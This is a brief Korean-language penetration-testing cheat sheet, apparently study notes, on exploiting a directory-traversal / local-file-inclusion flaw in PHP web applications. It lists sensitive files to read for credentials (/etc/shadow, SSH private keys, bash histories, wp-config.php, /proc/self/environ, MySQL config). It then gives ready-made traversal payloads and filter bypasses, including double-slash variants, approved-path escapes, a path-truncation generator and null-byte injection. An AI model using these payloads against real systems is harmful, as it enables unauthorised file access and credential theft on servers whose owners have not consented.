# Directory Traversal 성공, 그 후? 1. `/etc/passwd` 에 접근 -> 유저 이름 수집. 2. `/etc/shadow` 접근 시도 -> root 유저가 아니라면 접근 불가 1. 접근 성공 했다면 hash crack 3. SSH private key, config file 찾기 1. `/home/john/.ssh/id_rsa` 2. `/home/john/.ssh/authorized_keys` 3. `/home/john/.bash_history` 4. `/var/www/html/config.php` 5. `/etc/apache2/sites-enabled/000-default.conf` 6. `/var/www/html/wp-config.php` 4. 웹 루트 및 소스 코드 확인 1. `/var/www/html/index.php` 2. `/var/www/html/.git/config` 3. `/var/www/html/uploads` 5. 추가 힌트/credentials 수집 1. `/proc/self/environ` -> 웹 서버의 환경 변수 2. `/root/.bash_history` 3. `/etc/mysql/my.cnf` ```bash ../../../etc/passwd ....//....//....//etc/passwd # Filename Prefix /../../../etc/passwd # Try encoding and Double encoding # Approved Paths - Find the approved path and go back to the root directory and read the file /index.php?language=./languages/../../../../etc/passwd # Appended Extensions (e.g., .php) - Doesn't work on modern PHP - If we reach 4096 character limitation, the appended extension would be truncated - Start the path with a non-existing directory ?language=non_existing_dir/../../../../../etc/passwd/././././. (REPEAT) echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done # Null Bytes /etc/passwd%00 ```